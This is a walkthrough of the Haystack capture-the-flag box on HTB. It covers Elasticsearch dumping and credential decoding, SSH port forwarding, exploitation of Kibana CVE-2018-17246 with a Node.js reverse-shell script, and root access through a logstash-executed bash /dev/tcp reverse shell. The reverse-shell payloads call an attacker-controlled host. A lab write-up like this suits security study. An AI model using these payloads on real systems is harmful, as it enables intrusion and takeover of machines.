
Finding the Needle in the Haystack





A simple walkthrough for Haystack on HTB


Host Information

Hostname: Haystack
Operating System: Linux
HTB Difficulty Rating: Easy







We start off, as always, with our initial nmap scan, which results in the following report:

Nmap scan report for
Host is up (0.61s latency).
Not shown: 997 filtered ports
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 2a:8d:e2:92:8b:14:b6:3f:e4:2f:3a:47:43:23:8b:2b (RSA)
|   256 e7:5a:3a:97:8e:8e:72:87:69:a3:0d:d1:00:bc:1f:09 (ECDSA)
|_  256 01:d2:59:b2:66:0a:97:49:20:5f:1c:84:eb:81:ed:95 (ED25519)
80/tcp   open  http    nginx 1.12.2
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn't have a title (text/html).
9200/tcp open  http    nginx 1.12.2
| http-methods: 
|_  Potentially risky methods: DELETE
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn't have a title (application/json; charset=UTF-8).

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 81.58 seconds


further enumeration on http

Seeing that port 80 is open, let’s browse to the IP in a browser. This leads to a page with a single image. Let’s download it with wget and check it for clues. Based on the name of the box (and the implication of a needle in a haystack), I get the impression that some of this may be very CTF-like.


Running strings on the file shows that the last line is a base64 string. Decode it using:

echo bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg== | base64 -d 

which decodes to la aguja en el pajar es “clave”. Translated from Spanish to English: the needle in the haystack is “key”.

Interesting, CTF-like indeed.
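For the curious, the extraction trick can be reproduced locally with a stand-in file. The file name and JPEG marker bytes below are made up; only the base64 needle is the real one from the box:

```shell
# Build a fake "image" with some printable junk, then append the needle after
# the end-of-image marker bytes, much like data hides in a real JPEG
printf '\377\330\377\340 fake jpeg body \377\331' > /tmp/needle.jpg
printf 'bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==' >> /tmp/needle.jpg

# strings surfaces the appended run; the last line is the needle
strings /tmp/needle.jpg | tail -n 1 | base64 -d   # -> la aguja en el pajar es "clave"
```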

I then ran a dirb scan with the common wordlist, but it only yielded index.html. Alright, time to move on to something else.


searching for the needle in elasticsearch

Going back to the port listing from nmap, it looks like 9200 is open, which is an Elasticsearch instance. After some quick browsing of the URIs available on the instance, we see one ending in _search. Visiting that URI in a browser returns a fair number of records. Both viewing the results in a browser and wget’ing the page dumped a number of records, but after spending a fair amount of time searching them, they didn’t seem to be of any use for gaining a foothold, nor, as best I could tell, did they contain anything useful for a later privesc.

After a bit more searching I noticed there is a _/sqldump option URI on the site. While that itself didn’t provide anything new (without knowing proper Elasticsearch query syntax), it gave me the strong impression that I needed to dump the database. At first I thought I had done just that, but then realized the records served under the _ page were probably truncated to a fixed count. Some googling seemed to confirm this.
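For context, Elasticsearch’s _search endpoint returns only 10 hits by default, which explains the truncation; the size parameter raises that cap. A quick sketch (TARGET is a placeholder, not the box’s real address):

```shell
# _search defaults to 10 hits; ask for more explicitly via the size parameter
TARGET="10.10.10.10"   # placeholder IP
QUERY="http://$TARGET:9200/quotes/_search?size=1000"
echo "$QUERY"
# curl -s "$QUERY"     # run this against the live instance
```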

After some searching for the proper syntax to query and dump Elasticsearch repositories, I decided I was spending too much time on this particular avenue, and instead downloaded a tool from GitHub called elasticdump.

Usage of the tool was simple enough; running the following dumped the contents of the Elasticsearch database:

./bin/elasticdump --input= --output=/home/initinfosec/writeups/haystack_HTB/loot/db.dmp


initial foothold & user access

Searching through db.dmp revealed more records than were visible through the initial web/URI method I was using earlier, so my hunch was confirmed. I noticed Spanish text in here, which reminded me of the original hint in the image, which was also in Spanish. Searching for “clave” (“key” - again, very CTF-ish) I noticed two occurrences, both containing base64:

cat db.dmp | grep -i clave                                                                                                                           
{"_index":"quotes","_type":"quote","_id":"111","_score":1,"_source":{"quote":"Esta clave no se puede perder, la guardo aca: cGFzczogc3BhbmlzaC5pcy5rZXk="}}
{"_index":"quotes","_type":"quote","_id":"45","_score":1,"_source":{"quote":"Tengo que guardar la clave para la maquina: dXNlcjogc2VjdXJpdHkg "}}

Decoding both of those base64 encoded strings (with a simple echo "base64 encoded text" | base64 -d) gave me the user “security” and the password needed to log in via SSH.
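Concretely, decoding the two base64 blobs shown in the grep output above:

```shell
echo 'dXNlcjogc2VjdXJpdHkg' | base64 -d          # -> user: security
echo 'cGFzczogc3BhbmlzaC5pcy5rZXk=' | base64 -d   # -> pass: spanish.is.key
```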

Test the credentials out, and they work. Great, we have an initial foothold. Oh, and this box’s language is set to Spanish - ¡divertido! (fun!)

Let’s go ahead and grab the user.txt from /home/security before we move on.


PrivEsc Enumeration

Now that we have an initial foothold into the box, we’ll need to do further enumeration for a way to escalate privileges and move across the system.


World writable directories


We’ll start with searching for world-writeable directories, in case we need to write a file for an exploit:

[security@haystack share]$ find / -writable -type d 2>/dev/null 
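As a quick sanity check that the predicate behaves as expected - on any Linux box, /tmp should appear in that list:

```shell
# /tmp is world-writable by design, so the -writable test must match it
find /tmp -maxdepth 0 -writable -type d   # -> /tmp
```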



further enumeration for internal connections, services, and configs


We can also see what ports are listening from the perspective of the host. On this box, ss has replaced the (now technically deprecated) netstat:

[security@haystack ~]$ ss -4 -ln
Netid State      Recv-Q Send-Q Local Address:Port               Peer Address:Port              
udp   UNCONN     0      0                      *:*                  
tcp   LISTEN     0      128          *:80                       *:*                  
tcp   LISTEN     0      128          *:9200                     *:*                  
tcp   LISTEN     0      128          *:22                       *:*                  
tcp   LISTEN     0      128          127.0.0.1:5601             *:*                  

Now ports 22, 80, and 9200 are no surprise, but TCP port 5601 is new to us. A quick Google query tells us that this port is associated with the Kibana application. This likely means the entire ELK stack (Elasticsearch, Logstash, Kibana) is implemented - it seems the CTF-like start has now moved to a more realistic, real-world system implementation.


Port forwarding & leveraging kibana for further exploitation


The other key thing to note here is that the service is only accessible internally, through localhost. That means if we want to browse and use the kibana application, we will have to make it appear as if we are doing so locally from the ‘haystack’ system.

If we wanted to, we could drill down further to confirm that the kibana service is running and take a look at the config files. A quick google tells us that kibana leverages .yml files to direct a lot of its config.

First we can run ps and grep for the kibana process to confirm it’s running on the system:

[security@haystack ~]$ ps -ef | grep kibana
kibana     6355      1  0 12:43 ?        00:01:35 /usr/share/kibana/bin/../node/bin/node --no-warnings /usr/share/kibana/bin/../src/cli -c /etc/kibana/kibana.yml
security  19660  16911  0 18:42 pts/0    00:00:00 grep --color=auto kibana
[security@haystack ~]$ 


So we know it’s running, and it also appears to be pulling its config from /etc/kibana/kibana.yml. We could also have run the following to search for .yml files on the haystack host:

[security@haystack ~]$ find / -name "*.yml" 2>/dev/null

This returns a lot more results as well, but we notice that both kibana and logstash have .yml config files. (This also confirms the entire ELK stack is installed on the system.) Looking at a portion of the kibana config confirms the service is set to run on localhost port 5601:

[security@haystack ~]$ cat /etc/kibana/kibana.yml
# Kibana is served by a back end server. This setting specifies the port to use.
server.port: 5601

# Specifies the address to which the Kibana server will bind. IP addresses and host names are both valid values.
# The default is 'localhost', which usually means remote machines will not be able to connect.
# To allow connections from remote users, set this parameter to a non-loopback address. ""


# The URL of the Elasticsearch instance to use for all your queries.
elasticsearch.url: "http://localhost:9200"

The obvious solution here is port forwarding. Luckily, we have ssh running and are logged into the remote system, so we can use ssh to port forward - it’s something of a “swiss army knife” for remote connection and administration.

If you do it right, either remote or local forwarding will work, as long as your understanding of the perspective of local and remote (both from the local system you’re running your tooling on and from the haystack system) is correct.

After some thinking and fiddling, we can use the following, run from our local (attacker) system. Remember that when running this command, we will have to enter the SSH credentials for the ‘security’ user that we found earlier. It may take a minute to prompt, and once you enter the creds, the prompt may just sit there.

╰─➤  ssh -N -L 5601:127.0.0.1:5601 security@<haystack IP>
security@<haystack IP>'s password: 

This sends any local traffic bound for port 5601 on localhost to the remote system on that same port. The -N flag tells ssh not to execute a remote command - just forward the port.

Make sure to keep this terminal window open, and don’t Ctrl+C out of the running command, as we’ll need the port forward for a good bit going forward. It’s best to open a new tab or a new terminal window and leave this running in the background.

OK, from here we can test connectivity and confirm we setup port forwarding correctly:

 ss -an | grep 5601
u_seq             ESTAB                  0                   0                                                                    * 156009                    * 156010                                                                          
u_seq             ESTAB                  0                   0                                                                    * 156010                    * 156009                                                                          
tcp               LISTEN                 0                   128                                                          127.0.0.1:5601                0.0.0.0:*                                                                               
tcp               LISTEN                 0                   128                                                              [::1]:5601                   [::]:*                                                                               

OK, so 5601 is open and listening. Let’s go to http://localhost:5601 and confirm that kibana shows in our local (attacker) browser:


Exploiting Kibana

Great, so we can access Kibana. Now we need to see how we can exploit it to further our access on the system. Some cursory searching shows a pretty well-known LFI (Local File Inclusion) vulnerability, CVE-2018-17246, which allows directory traversal and lets us pull in parts of the filesystem outside of the kibana application itself.

Great, so we should be able to use one of the world-writable directories we found earlier to create a file containing a reverse TCP payload. When reading the ELK documentation earlier, it looked like there was support for js, so let’s go ahead and write a file called shell.js on the remote haystack system we are ssh’d into. Here’s a good, simple js shell PoC I found and used.

We’ll use the /dev/shm directory, so after copying the PoC to my clipboard, I pasted it using vim:

[security@haystack shm]$ vim shell.js
[security@haystack shm]$ cat shell.js 
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(8080, "<VPN IP>", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
[security@haystack shm]$ 
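If pasting into vim over a laggy shell is awkward, a quoted here-doc writes the full PoC in one shot. The body below is the standard public reverse-shell PoC for Node.js; <VPN IP> stays a placeholder for your tun0 address:

```shell
# Quoted 'EOF' prevents any shell expansion inside the payload
cat > /dev/shm/shell.js <<'EOF'
var net = require("net"),
    cp = require("child_process"),
    sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(8080, "<VPN IP>", function(){
    client.pipe(sh.stdin);
    sh.stdout.pipe(client);
    sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application from crashing
EOF
```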


Great, the payload is in place. Now let’s start a local listener on port 8080 to try and catch our reverse TCP shell:

nc -lvnp 8080

This netcat command as written will listen on all interfaces, so we should be good. Now that the listener is set up, let’s use the LFI URI to access and run the shell.js resource. If we are successful, we will probably be dropped in as the kibana user, since the site is served as that user. Let’s check it out:
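The URI shape used by public CVE-2018-17246 PoCs looks like the following; the path and the number of ../ segments are taken from published writeups, so treat them as an assumption that may need adjusting:

```shell
# Assumed PoC path for CVE-2018-17246 (from public writeups); the ../ count
# must walk from Kibana's install dir back to the filesystem root
PAYLOAD="/dev/shm/shell.js"
LFI="http://localhost:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../..${PAYLOAD}"
echo "$LFI"
# curl -s "$LFI"   # through the SSH tunnel set up earlier
```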
Connection from

Awesome, we got a shell as the kibana user. Making progress! We quickly realize that our shell kinda sucks, so let’s go ahead and make sure we have python on the remote system, and if so, upgrade the shell using a handy python one-liner:

which python

Great, now:

/usr/bin/python -c 'import pty; pty.spawn("/bin/bash")'


Privilege Escalation & Gaining Root

Great. Now we need to do further digging to figure out how to get root.

I have a hunch that we will need to traverse or use the entire ELK stack for this box, and we’ve already utilized both ElasticSearch and Kibana. Let’s check out what Logstash has to offer - if this ends up being a dead end, we’ll continue with more enumeration in other areas.

First, we can confirm logstash is running on the system with ps -ef | grep logstash. It does appear to be running, wrapped in a long java invocation. We can at least somewhat confirm our suspicion of being able to exploit logstash to gain root by checking whether a logstash process is running with root privileges. If not, we’ll have to take another avenue.

From the haystack user shell:

ps -elf|grep root|grep logstash

Great, the same logstash process we saw earlier returned, confirming logstash is running with root privileges. Looks like this might indeed be our path to a root shell.

Let’s continue.

Recall also that there was a logstash.yml file in /etc/logstash found in our earlier enumeration. Let’s see what’s in that directory:

cd /etc/logstash
ls -ltr
total 40
-rw-r--r--. 1 root   kibana  285 sep 26  2018 pipelines.yml
-rw-r--r--. 1 root   kibana 8164 sep 26  2018 logstash.yml.rpmnew
-rw-r--r--. 1 root   kibana  342 sep 26  2018 logstash-sample.conf
-rw-r--r--. 1 root   kibana 4466 sep 26  2018
-rw-r--r--. 1 root   kibana 1850 nov 28  2018 jvm.options
-rw-------. 1 kibana kibana 1725 dic 10  2018 startup.options
-rw-r--r--. 1 root   kibana 8192 ene 23  2019 logstash.yml
drwxrwxr-x. 2 root   kibana   62 jun 24 08:12 conf.d

Interesting, let’s check out the .yml file first, then the conf.d directory.

So the yaml file has a fair bit of information, some of which may or may not be of note.

# ------------ Data path ------------------
# Which directory should be used by logstash and its plugins
# for any persistent needs. Defaults to LOGSTASH_HOME/data
# /var/lib/logstash

Good to know how logstash is configured, but not sure that’s of use at the moment. Let’s check out the conf.d directory:

cd conf.d
ls -ltr
total 12
-rw-r-----. 1 root kibana 131 jun 20 10:59 filter.conf
-rw-r-----. 1 root kibana 186 jun 24 08:12 input.conf
-rw-r-----. 1 root kibana 109 jun 24 08:12 output.conf

cat input.conf
input {
	file {
		path => "/opt/kibana/logstash_*"
		start_position => "beginning"
		sincedb_path => "/dev/null"
		stat_interval => "10 second"
		type => "execute"
		mode => "read"
	}
}

Leveraging Logstash to gain root


Now that’s interesting: it looks like logstash takes its input from files in the /opt/kibana/ directory with a logstash_ prefix.

Could we potentially leverage this to get arbitrary code execution from a file that would not normally be executed or ingested by logstash?

Seems an intriguing possibility. Let’s check out the filter.conf file to see if we get any idea of the syntax or format a file would need in order to be processed by logstash:

bash-4.2$ cat /etc/logstash/conf.d/filter.conf
cat /etc/logstash/conf.d/filter.conf
filter {
	if [type] == "execute" {
		grok {
			match => { "message" => "Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}" }
		}
	}
}
Hmm, so this gives us a good idea to play with, but it will take some tweaking. The conf file is also a good reminder that our command syntax will need to be in Spanish. Some quick reading shows that grok is the pattern-matching syntax logstash uses for filtering, expression matching, and field extraction. So if our input matches Ejecutar comando: some_command, an arbitrary command just might run. From reading a bit on logstash earlier, it also seems that the logs are ingested and processed on a recurring interval (e.g. every 2 minutes), so it may take a moment to see any results.
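We can sanity-check the pattern logic locally before touching the box, using grep -E with POSIX character classes standing in for grok’s \s (the grok semantics here are my reading, not tested against logstash itself):

```shell
# Emulate "Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}" with an ERE;
# grep prints the line back if (and only if) the pattern matches
echo "Ejecutar comando: whoami" | \
    grep -E 'Ejecutar[[:space:]]*comando[[:space:]]*:[[:space:]]+.+'
```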

Let’s go ahead and see if we can run a reverse tcp shell command from logstash. Let’s go ahead and open a listener on our local system on a port to catch the shell, if one spawns.

sudo nc -lnvp 1234

OK, now we’ll want to create a file to be ingested, in /opt/kibana with the logstash_ prefix. Let’s go ahead and do that on the haystack system we have the security user logon for. The output in the shell looks like this:

bash-4.2$ echo "Ejecutar comando: bash -i >& /dev/tcp/<VPN IP>/1234 0>&1" > /opt/kibana/logstash_1.txt

After about 2 minutes, when logstash processes the file, boom, we get a root shell!

Connection from
bash: no hay control de trabajos en este shell
[root@haystack /]# 

Fantastic. From here we can grab the root flag at /root/root.txt. (The Spanish bash message above just means “no job control in this shell.”)

And we’re done.




hackthebox, HTB, writeups, walkthrough, hacking, pentest, OSCP prep